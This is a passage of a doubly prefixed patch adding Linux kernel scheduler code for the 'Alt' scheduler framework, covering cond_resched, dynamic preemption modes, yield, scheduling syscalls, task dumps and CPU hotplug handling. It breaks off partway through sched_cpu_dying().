++#define cond_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(cond_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(cond_resched);
++
++#define might_resched_dynamic_enabled	__cond_resched
++#define might_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(might_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(might_resched);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_cond_resched);
++int __sched dynamic_cond_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_cond_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_cond_resched);
++
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_might_resched);
++int __sched dynamic_might_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_might_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_might_resched);
++#endif
++#endif
++
++/*
++ * __cond_resched_lock() - if a reschedule is pending, drop the given lock,
++ * call schedule, and on return reacquire the lock.
++ *
++ * This works OK both with and without CONFIG_PREEMPTION.  We do strange low-level
++ * operations here to prevent schedule() from being called twice (once via
++ * spin_unlock(), once by hand).
++ */
++int __cond_resched_lock(spinlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held(lock);
++
++	if (spin_needbreak(lock) || resched) {
++		spin_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		spin_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_lock);
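++
++/*
++ * Sketch of the intended call pattern (more_work() and do_one_item() are
++ * placeholders):
++ *
++ *	spin_lock(&lock);
++ *	while (more_work()) {
++ *		do_one_item();
++ *		cond_resched_lock(&lock);	// may drop and retake 'lock'
++ *	}
++ *	spin_unlock(&lock);
++ */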
++
++int __cond_resched_rwlock_read(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_read(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		read_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		read_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_read);
++
++int __cond_resched_rwlock_write(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_write(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		write_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		write_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_write);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++
++#ifdef CONFIG_GENERIC_ENTRY
++#include <linux/entry-common.h>
++#endif
++
++/*
++ * SC:cond_resched
++ * SC:might_resched
++ * SC:preempt_schedule
++ * SC:preempt_schedule_notrace
++ * SC:irqentry_exit_cond_resched
++ *
++ *
++ * NONE:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * VOLUNTARY:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- __cond_resched
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * FULL:
++ *   cond_resched               <- RET0
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- preempt_schedule
++ *   preempt_schedule_notrace   <- preempt_schedule_notrace
++ *   irqentry_exit_cond_resched <- irqentry_exit_cond_resched
++ */
++
++enum {
++	preempt_dynamic_undefined = -1,
++	preempt_dynamic_none,
++	preempt_dynamic_voluntary,
++	preempt_dynamic_full,
++};
++
++int preempt_dynamic_mode = preempt_dynamic_undefined;
++
++int sched_dynamic_mode(const char *str)
++{
++	if (!strcmp(str, "none"))
++		return preempt_dynamic_none;
++
++	if (!strcmp(str, "voluntary"))
++		return preempt_dynamic_voluntary;
++
++	if (!strcmp(str, "full"))
++		return preempt_dynamic_full;
++
++	return -EINVAL;
++}
++
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define preempt_dynamic_enable(f)	static_call_update(f, f##_dynamic_enabled)
++#define preempt_dynamic_disable(f)	static_call_update(f, f##_dynamic_disabled)
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++#define preempt_dynamic_enable(f)	static_key_enable(&sk_dynamic_##f.key)
++#define preempt_dynamic_disable(f)	static_key_disable(&sk_dynamic_##f.key)
++#else
++#error "Unsupported PREEMPT_DYNAMIC mechanism"
++#endif
++
++void sched_dynamic_update(int mode)
++{
++	/*
++	 * Avoid {NONE,VOLUNTARY} -> FULL transitions from ever ending up in
++	 * the ZERO state, which is invalid.
++	 */
++	preempt_dynamic_enable(cond_resched);
++	preempt_dynamic_enable(might_resched);
++	preempt_dynamic_enable(preempt_schedule);
++	preempt_dynamic_enable(preempt_schedule_notrace);
++	preempt_dynamic_enable(irqentry_exit_cond_resched);
++
++	switch (mode) {
++	case preempt_dynamic_none:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: none\n");
++		break;
++
++	case preempt_dynamic_voluntary:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_enable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: voluntary\n");
++		break;
++
++	case preempt_dynamic_full:
++		preempt_dynamic_disable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_enable(preempt_schedule);
++		preempt_dynamic_enable(preempt_schedule_notrace);
++		preempt_dynamic_enable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: full\n");
++		break;
++	}
++
++	preempt_dynamic_mode = mode;
++}
++
++static int __init setup_preempt_mode(char *str)
++{
++	int mode = sched_dynamic_mode(str);
++	if (mode < 0) {
++		pr_warn("Dynamic Preempt: unsupported mode: %s\n", str);
++		return 0;
++	}
++
++	sched_dynamic_update(mode);
++	return 1;
++}
++__setup("preempt=", setup_preempt_mode);
++
++static void __init preempt_dynamic_init(void)
++{
++	if (preempt_dynamic_mode == preempt_dynamic_undefined) {
++		if (IS_ENABLED(CONFIG_PREEMPT_NONE)) {
++			sched_dynamic_update(preempt_dynamic_none);
++		} else if (IS_ENABLED(CONFIG_PREEMPT_VOLUNTARY)) {
++			sched_dynamic_update(preempt_dynamic_voluntary);
++		} else {
++			/* Default static call setting, nothing to do */
++			WARN_ON_ONCE(!IS_ENABLED(CONFIG_PREEMPT));
++			preempt_dynamic_mode = preempt_dynamic_full;
++			pr_info("Dynamic Preempt: full\n");
++		}
++	}
++}
++
++#define PREEMPT_MODEL_ACCESSOR(mode) \
++	bool preempt_model_##mode(void)						 \
++	{									 \
++		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined); \
++		return preempt_dynamic_mode == preempt_dynamic_##mode;		 \
++	}									 \
++	EXPORT_SYMBOL_GPL(preempt_model_##mode)
++
++PREEMPT_MODEL_ACCESSOR(none);
++PREEMPT_MODEL_ACCESSOR(voluntary);
++PREEMPT_MODEL_ACCESSOR(full);
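++
++/*
++ * For clarity, PREEMPT_MODEL_ACCESSOR(none) above expands to:
++ *
++ *   bool preempt_model_none(void)
++ *   {
++ *           WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined);
++ *           return preempt_dynamic_mode == preempt_dynamic_none;
++ *   }
++ *   EXPORT_SYMBOL_GPL(preempt_model_none);
++ */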
++
++#else /* !CONFIG_PREEMPT_DYNAMIC */
++
++static inline void preempt_dynamic_init(void) { }
++
++#endif /* #ifdef CONFIG_PREEMPT_DYNAMIC */
++
++/**
++ * yield - yield the current processor to other threads.
++ *
++ * Do not ever use this function, there's a 99% chance you're doing it wrong.
++ *
++ * The scheduler is at all times free to pick the calling task as the most
++ * eligible task to run, if removing the yield() call from your code breaks
++ * it, it's already broken.
++ *
++ * Typical broken usage is:
++ *
++ * while (!event)
++ * 	yield();
++ *
++ * where one assumes that yield() will let 'the other' process run that will
++ * make event true. If the current task is a SCHED_FIFO task that will never
++ * happen. Never use yield() as a progress guarantee!!
++ *
++ * If you want to use yield() to wait for something, use wait_event().
++ * If you want to use yield() to be 'nice' for others, use cond_resched().
++ * If you still want to use yield(), do not!
++ */
++void __sched yield(void)
++{
++	set_current_state(TASK_RUNNING);
++	do_sched_yield();
++}
++EXPORT_SYMBOL(yield);
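++
++/*
++ * A minimal sketch of the wait_event() pattern recommended above ('wq'
++ * and 'done' are hypothetical names):
++ *
++ *   static DECLARE_WAIT_QUEUE_HEAD(wq);
++ *   static bool done;
++ *
++ *   waiter (instead of "while (!done) yield();"):
++ *       wait_event(wq, done);
++ *
++ *   producer:
++ *       done = true;
++ *       wake_up(&wq);
++ */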
++
++/**
++ * yield_to - yield the current processor to another thread in
++ * your thread group, or accelerate that thread toward the
++ * processor it's on.
++ * @p: target task
++ * @preempt: whether task preemption is allowed or not
++ *
++ * It's the caller's job to ensure that the target task struct
++ * can't go away on us before we can do any checks.
++ *
++ * In the Alt scheduler framework, yield_to() is not supported; this is
++ * a stub kept for API compatibility.
++ *
++ * Return: always 0 (the target task is never boosted).
++ */
++int __sched yield_to(struct task_struct *p, bool preempt)
++{
++	return 0;
++}
++EXPORT_SYMBOL_GPL(yield_to);
++
++int io_schedule_prepare(void)
++{
++	int old_iowait = current->in_iowait;
++
++	current->in_iowait = 1;
++	blk_flush_plug(current->plug, true);
++	return old_iowait;
++}
++
++void io_schedule_finish(int token)
++{
++	current->in_iowait = token;
++}
++
++/*
++ * This task is about to go to sleep on IO.  Increment rq->nr_iowait so
++ * that process accounting knows that this is a task in IO wait state.
++ *
++ * But don't do that if it is a deliberate, throttling IO wait (this task
++ * has set its backing_dev_info: the queue against which it should throttle)
++ */
++
++long __sched io_schedule_timeout(long timeout)
++{
++	int token;
++	long ret;
++
++	token = io_schedule_prepare();
++	ret = schedule_timeout(timeout);
++	io_schedule_finish(token);
++
++	return ret;
++}
++EXPORT_SYMBOL(io_schedule_timeout);
++
++void __sched io_schedule(void)
++{
++	int token;
++
++	token = io_schedule_prepare();
++	schedule();
++	io_schedule_finish(token);
++}
++EXPORT_SYMBOL(io_schedule);
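++
++/*
++ * Illustrative only: code that blocks through its own primitive can
++ * still be accounted as iowait by bracketing the sleep with the two
++ * helpers, exactly as io_schedule_timeout() does above:
++ *
++ *   int token = io_schedule_prepare();
++ *   mutex_lock(&some_io_mutex);      (hypothetical blocking call)
++ *   io_schedule_finish(token);
++ */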
++
++/**
++ * sys_sched_get_priority_max - return maximum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the maximum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_max, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = MAX_RT_PRIO - 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
++
++/**
++ * sys_sched_get_priority_min - return minimum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the minimum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_min, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
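++
++/*
++ * Example return values (assuming the usual MAX_RT_PRIO of 100):
++ *
++ *   sched_get_priority_max(SCHED_FIFO)   -> 99
++ *   sched_get_priority_min(SCHED_FIFO)   -> 1
++ *   sched_get_priority_max(SCHED_NORMAL) -> 0
++ *   sched_get_priority_min(SCHED_NORMAL) -> 0
++ */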
++
++static int sched_rr_get_interval(pid_t pid, struct timespec64 *t)
++{
++	struct task_struct *p;
++	int retval;
++
++	alt_sched_debug();
++
++	if (pid < 0)
++		return -EINVAL;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++	rcu_read_unlock();
++
++	*t = ns_to_timespec64(sched_timeslice_ns);
++	return 0;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/**
++ * sys_sched_rr_get_interval - return the default timeslice of a process.
++ * @pid: pid of the process.
++ * @interval: userspace pointer to the timeslice value.
++ *
++ * Return: On success, 0 and the timeslice is in @interval. Otherwise,
++ * an error code.
++ */
++SYSCALL_DEFINE2(sched_rr_get_interval, pid_t, pid,
++		struct __kernel_timespec __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_timespec64(&t, interval);
++
++	return retval;
++}
++
++#ifdef CONFIG_COMPAT_32BIT_TIME
++SYSCALL_DEFINE2(sched_rr_get_interval_time32, pid_t, pid,
++		struct old_timespec32 __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_old_timespec32(&t, interval);
++	return retval;
++}
++#endif
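++
++/*
++ * Userspace sketch (illustrative): querying the timeslice of the
++ * calling thread, where pid 0 means "current":
++ *
++ *   struct timespec ts;
++ *   sched_rr_get_interval(0, &ts);
++ *
++ * Under this scheduler the result is always sched_timeslice_ns,
++ * regardless of the task's policy.
++ */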
++
++void sched_show_task(struct task_struct *p)
++{
++	unsigned long free = 0;
++	int ppid;
++
++	if (!try_get_task_stack(p))
++		return;
++
++	pr_info("task:%-15.15s state:%c", p->comm, task_state_to_char(p));
++
++	if (task_is_running(p))
++		pr_cont("  running task    ");
++#ifdef CONFIG_DEBUG_STACK_USAGE
++	free = stack_not_used(p);
++#endif
++	ppid = 0;
++	rcu_read_lock();
++	if (pid_alive(p))
++		ppid = task_pid_nr(rcu_dereference(p->real_parent));
++	rcu_read_unlock();
++	pr_cont(" stack:%-5lu pid:%-5d ppid:%-6d flags:0x%08lx\n",
++		free, task_pid_nr(p), ppid,
++		read_task_thread_flags(p));
++
++	print_worker_info(KERN_INFO, p);
++	print_stop_info(KERN_INFO, p);
++	show_stack(p, NULL, KERN_INFO);
++	put_task_stack(p);
++}
++EXPORT_SYMBOL_GPL(sched_show_task);
++
++static inline bool
++state_filter_match(unsigned long state_filter, struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/* no filter, everything matches */
++	if (!state_filter)
++		return true;
++
++	/* filter, but doesn't match */
++	if (!(state & state_filter))
++		return false;
++
++	/*
++	 * When looking for TASK_UNINTERRUPTIBLE skip TASK_IDLE (allows
++	 * TASK_KILLABLE).
++	 */
++	if (state_filter == TASK_UNINTERRUPTIBLE && (state & TASK_NOLOAD))
++		return false;
++
++	return true;
++}
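++
++/*
++ * Example: "echo w > /proc/sysrq-trigger" ends up calling
++ * show_state_filter(TASK_UNINTERRUPTIBLE). Per the rules above, a
++ * TASK_IDLE task (TASK_UNINTERRUPTIBLE | TASK_NOLOAD) is skipped,
++ * while plain TASK_UNINTERRUPTIBLE and TASK_KILLABLE sleepers match.
++ */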
++
++
++void show_state_filter(unsigned int state_filter)
++{
++	struct task_struct *g, *p;
++
++	rcu_read_lock();
++	for_each_process_thread(g, p) {
++		/*
++		 * reset the NMI-timeout, listing all files on a slow
++		 * console might take a lot of time:
++		 * Also, reset softlockup watchdogs on all CPUs, because
++		 * another CPU might be blocked waiting for us to process
++		 * an IPI.
++		 */
++		touch_nmi_watchdog();
++		touch_all_softlockup_watchdogs();
++		if (state_filter_match(state_filter, p))
++			sched_show_task(p);
++	}
++
++#ifdef CONFIG_SCHED_DEBUG
++	/* TODO: Alt schedule FW should support this
++	if (!state_filter)
++		sysrq_sched_debug_show();
++	*/
++#endif
++	rcu_read_unlock();
++	/*
++	 * Only show locks if all tasks are dumped:
++	 */
++	if (!state_filter)
++		debug_show_all_locks();
++}
++
++void dump_cpu_task(int cpu)
++{
++	if (cpu == smp_processor_id() && in_hardirq()) {
++		struct pt_regs *regs;
++
++		regs = get_irq_regs();
++		if (regs) {
++			show_regs(regs);
++			return;
++		}
++	}
++
++	if (trigger_single_cpu_backtrace(cpu))
++		return;
++
++	pr_info("Task dump for CPU %d:\n", cpu);
++	sched_show_task(cpu_curr(cpu));
++}
++
++/**
++ * init_idle - set up an idle thread for a given CPU
++ * @idle: task in question
++ * @cpu: CPU the idle task belongs to
++ *
++ * NOTE: this function does not set the idle thread's NEED_RESCHED
++ * flag, to make booting more robust.
++ */
++void __init init_idle(struct task_struct *idle, int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	__sched_fork(0, idle);
++
++	raw_spin_lock_irqsave(&idle->pi_lock, flags);
++	raw_spin_lock(&rq->lock);
++
++	idle->last_ran = rq->clock_task;
++	idle->__state = TASK_RUNNING;
++	/*
++	 * PF_KTHREAD should already be set at this point; regardless, make it
++	 * look like a proper per-CPU kthread.
++	 */
++	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
++	kthread_set_per_cpu(idle, cpu);
++
++	sched_queue_init_idle(&rq->queue, idle);
++
++#ifdef CONFIG_SMP
++	/*
++	 * It's possible that init_idle() gets called multiple times on a task,
++	 * in that case do_set_cpus_allowed() will not do the right thing.
++	 *
++	 * And since this is boot we can forgo the serialisation.
++	 */
++	set_cpus_allowed_common(idle, cpumask_of(cpu));
++#endif
++
++	/* Silence PROVE_RCU */
++	rcu_read_lock();
++	__set_task_cpu(idle, cpu);
++	rcu_read_unlock();
++
++	rq->idle = idle;
++	rcu_assign_pointer(rq->curr, idle);
++	idle->on_cpu = 1;
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&idle->pi_lock, flags);
++
++	/* Set the preempt count _outside_ the spinlocks! */
++	init_idle_preempt_count(idle, cpu);
++
++	ftrace_graph_init_idle_task(idle, cpu);
++	vtime_init_idle(idle, cpu);
++#ifdef CONFIG_SMP
++	sprintf(idle->comm, "%s/%d", INIT_TASK_COMM, cpu);
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
++			      const struct cpumask __maybe_unused *trial)
++{
++	return 1;
++}
++
++int task_can_attach(struct task_struct *p,
++		    const struct cpumask *cs_effective_cpus)
++{
++	int ret = 0;
++
++	/*
++	 * Kthreads which disallow setaffinity shouldn't be moved
++	 * to a new cpuset; we don't want to change their CPU
++	 * affinity and isolating such threads by their set of
++	 * allowed nodes is unnecessary.  Thus, cpusets are not
++	 * applicable for such threads.  This prevents checking for
++	 * success of set_cpus_allowed_ptr() on all attached tasks
++	 * before cpus_mask may be changed.
++	 */
++	if (p->flags & PF_NO_SETAFFINITY)
++		ret = -EINVAL;
++
++	return ret;
++}
++
++bool sched_smp_initialized __read_mostly;
++
++#ifdef CONFIG_HOTPLUG_CPU
++/*
++ * Ensures that the idle task is using init_mm right before its CPU goes
++ * offline.
++ */
++void idle_task_exit(void)
++{
++	struct mm_struct *mm = current->active_mm;
++
++	BUG_ON(current != this_rq()->idle);
++
++	if (mm != &init_mm) {
++		switch_mm(mm, &init_mm, current);
++		finish_arch_post_lock_switch();
++	}
++
++	/* finish_cpu(), as ran on the BP, will clean up the active_mm state */
++}
++
++static int __balance_push_cpu_stop(void *arg)
++{
++	struct task_struct *p = arg;
++	struct rq *rq = this_rq();
++	struct rq_flags rf;
++	int cpu;
++
++	raw_spin_lock_irq(&p->pi_lock);
++	rq_lock(rq, &rf);
++
++	update_rq_clock(rq);
++
++	if (task_rq(p) == rq && task_on_rq_queued(p)) {
++		cpu = select_fallback_rq(rq->cpu, p);
++		rq = __migrate_task(rq, p, cpu);
++	}
++
++	rq_unlock(rq, &rf);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	put_task_struct(p);
++
++	return 0;
++}
++
++static DEFINE_PER_CPU(struct cpu_stop_work, push_work);
++
++/*
++ * This is enabled below SCHED_AP_ACTIVE; when !cpu_active(), but only
++ * effective while the CPU is going down (hotplug offline).
++ */
++static void balance_push(struct rq *rq)
++{
++	struct task_struct *push_task = rq->curr;
++
++	lockdep_assert_held(&rq->lock);
++
++	/*
++	 * Ensure the thing is persistent until balance_push_set(.on = false);
++	 */
++	rq->balance_callback = &balance_push_callback;
++
++	/*
++	 * Only active while going offline and when invoked on the outgoing
++	 * CPU.
++	 */
++	if (!cpu_dying(rq->cpu) || rq != this_rq())
++		return;
++
++	/*
++	 * Both the cpu-hotplug and stop task are in this case and are
++	 * required to complete the hotplug process.
++	 */
++	if (kthread_is_per_cpu(push_task) ||
++	    is_migration_disabled(push_task)) {
++
++		/*
++		 * If this is the idle task on the outgoing CPU try to wake
++		 * up the hotplug control thread which might wait for the
++		 * last task to vanish. The rcuwait_active() check is
++		 * accurate here because the waiter is pinned on this CPU
++		 * and can't obviously be running in parallel.
++		 *
++		 * On RT kernels this also has to check whether there are
++		 * pinned and scheduled out tasks on the runqueue. They
++		 * need to leave the migrate disabled section first.
++		 */
++		if (!rq->nr_running && !rq_has_pinned_tasks(rq) &&
++		    rcuwait_active(&rq->hotplug_wait)) {
++			raw_spin_unlock(&rq->lock);
++			rcuwait_wake_up(&rq->hotplug_wait);
++			raw_spin_lock(&rq->lock);
++		}
++		return;
++	}
++
++	get_task_struct(push_task);
++	/*
++	 * Temporarily drop rq->lock such that we can wake-up the stop task.
++	 * Both preemption and IRQs are still disabled.
++	 */
++	raw_spin_unlock(&rq->lock);
++	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
++			    this_cpu_ptr(&push_work));
++	/*
++	 * At this point need_resched() is true and we'll take the loop in
++	 * schedule(). The next pick is obviously going to be the stop task
++	 * which kthread_is_per_cpu() and will push this task away.
++	 */
++	raw_spin_lock(&rq->lock);
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++	struct rq *rq = cpu_rq(cpu);
++	struct rq_flags rf;
++
++	rq_lock_irqsave(rq, &rf);
++	if (on) {
++		WARN_ON_ONCE(rq->balance_callback);
++		rq->balance_callback = &balance_push_callback;
++	} else if (rq->balance_callback == &balance_push_callback) {
++		rq->balance_callback = NULL;
++	}
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++/*
++ * Invoked from a CPUs hotplug control thread after the CPU has been marked
++ * inactive. All tasks which are not per CPU kernel threads are either
++ * pushed off this CPU now via balance_push() or placed on a different CPU
++ * during wakeup. Wait until the CPU is quiescent.
++ */
++static void balance_hotplug_wait(void)
++{
++	struct rq *rq = this_rq();
++
++	rcuwait_wait_event(&rq->hotplug_wait,
++			   rq->nr_running == 1 && !rq_has_pinned_tasks(rq),
++			   TASK_UNINTERRUPTIBLE);
++}
++
++#else
++
++static void balance_push(struct rq *rq)
++{
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++}
++
++static inline void balance_hotplug_wait(void)
++{
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++static void set_rq_offline(struct rq *rq)
++{
++	if (rq->online)
++		rq->online = false;
++}
++
++static void set_rq_online(struct rq *rq)
++{
++	if (!rq->online)
++		rq->online = true;
++}
++
++/*
++ * used to mark begin/end of suspend/resume:
++ */
++static int num_cpus_frozen;
++
++/*
++ * Update cpusets according to cpu_active mask.  If cpusets are
++ * disabled, cpuset_update_active_cpus() becomes a simple wrapper
++ * around partition_sched_domains().
++ *
++ * If we come here as part of a suspend/resume, don't touch cpusets because we
++ * want to restore it back to its original state upon resume anyway.
++ */
++static void cpuset_cpu_active(void)
++{
++	if (cpuhp_tasks_frozen) {
++		/*
++		 * num_cpus_frozen tracks how many CPUs are involved in suspend
++		 * resume sequence. As long as this is not the last online
++		 * operation in the resume sequence, just build a single sched
++		 * domain, ignoring cpusets.
++		 */
++		partition_sched_domains(1, NULL, NULL);
++		if (--num_cpus_frozen)
++			return;
++		/*
++		 * This is the last CPU online operation. So fall through and
++		 * restore the original sched domains by considering the
++		 * cpuset configurations.
++		 */
++		cpuset_force_rebuild();
++	}
++
++	cpuset_update_active_cpus();
++}
++
++static int cpuset_cpu_inactive(unsigned int cpu)
++{
++	if (!cpuhp_tasks_frozen) {
++		cpuset_update_active_cpus();
++	} else {
++		num_cpus_frozen++;
++		partition_sched_domains(1, NULL, NULL);
++	}
++	return 0;
++}
++
++int sched_cpu_activate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/*
++	 * Clear the balance_push callback and prepare to schedule
++	 * regular tasks.
++	 */
++	balance_push_set(cpu, false);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going up, increment the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
++		static_branch_inc_cpuslocked(&sched_smt_present);
++#endif
++	set_cpu_active(cpu, true);
++
++	if (sched_smp_initialized)
++		cpuset_cpu_active();
++
++	/*
++	 * Put the rq online, if not already. This happens:
++	 *
++	 * 1) In the early boot process, because we build the real domains
++	 *    after all cpus have been brought up.
++	 *
++	 * 2) At runtime, if cpuset_cpu_active() fails to rebuild the
++	 *    domains.
++	 */
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	set_rq_online(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	return 0;
++}
++
++int sched_cpu_deactivate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++	int ret;
++
++	set_cpu_active(cpu, false);
++
++	/*
++	 * From this point forward, this CPU will refuse to run any task that
++	 * is not: migrate_disable() or KTHREAD_IS_PER_CPU, and will actively
++	 * push those tasks away until this gets cleared, see
++	 * sched_cpu_dying().
++	 */
++	balance_push_set(cpu, true);
++
++	/*
++	 * We've cleared cpu_active_mask, wait for all preempt-disabled and RCU
++	 * users of this state to go away such that all new such users will
++	 * observe it.
++	 *
++	 * Specifically, we rely on ttwu to no longer target this CPU, see
++	 * ttwu_queue_cond() and is_cpu_allowed().
++	 *
++	 * Do the sync before parking smpboot threads to take care of the
++	 * RCU boost case.
++	 */
++	synchronize_rcu();
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	update_rq_clock(rq);
++	set_rq_offline(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going down, decrement the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2) {
++		static_branch_dec_cpuslocked(&sched_smt_present);
++		if (!static_branch_likely(&sched_smt_present))
++			cpumask_clear(&sched_sg_idle_mask);
++	}
++#endif
++
++	if (!sched_smp_initialized)
++		return 0;
++
++	ret = cpuset_cpu_inactive(cpu);
++	if (ret) {
++		balance_push_set(cpu, false);
++		set_cpu_active(cpu, true);
++		return ret;
++	}
++
++	return 0;
++}
++
++static void sched_rq_cpu_starting(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	rq->calc_load_update = calc_load_update;
++}
++
++int sched_cpu_starting(unsigned int cpu)
++{
++	sched_rq_cpu_starting(cpu);
++	sched_tick_start(cpu);
++	return 0;
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++
++/*
++ * Invoked immediately before the stopper thread is invoked to bring the
++ * CPU down completely. At this point all per CPU kthreads except the
++ * hotplug thread (current) and the stopper thread (inactive) have been
++ * either parked or have been unbound from the outgoing CPU. Ensure that
++ * any of those which might be on the way out are gone.
++ *
++ * If after this point a bound task is being woken on this CPU then the
++ * responsible hotplug callback has failed to do its job.
++ * sched_cpu_dying() will catch it with the appropriate fireworks.
++ */
++int sched_cpu_wait_empty(unsigned int cpu)
++{
++	balance_hotplug_wait();
++	return 0;
++}
++
++/*
++ * Since this CPU is going 'away' for a while, fold any nr_active delta we
++ * might have. Called from the CPU stopper task after ensuring that the
++ * stopper is the last running task on the CPU, so nr_active count is
++ * stable. We need to take the teardown thread which is calling this into
++ * account, so we hand in adjust = 1 to the load calculation.
++ *
++ * Also see the comment "Global load-average calculations".
++ */
++static void calc_load_migrate(struct rq *rq)
++{
++	long delta = calc_load_fold_active(rq, 1);
++
++	if (delta)
++		atomic_long_add(delta, &calc_load_tasks);
++}
++
++static void dump_rq_tasks(struct rq *rq, const char *loglvl)
++{
++	struct task_struct *g, *p;
++	int cpu = cpu_of(rq);
++
++	lockdep_assert_held(&rq->lock);
++
++	printk("%sCPU%d enqueued tasks (%u total):\n", loglvl, cpu, rq->nr_running);
++	for_each_process_thread(g, p) {
++		if (task_cpu(p) != cpu)
++			continue;
++
++		if (!task_on_rq_queued(p))
++			continue;
++
++		printk("%s\tpid: %d, name: %s\n", loglvl, p->pid, p->comm);
++	}
++}
++
++int sched_cpu_dying(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
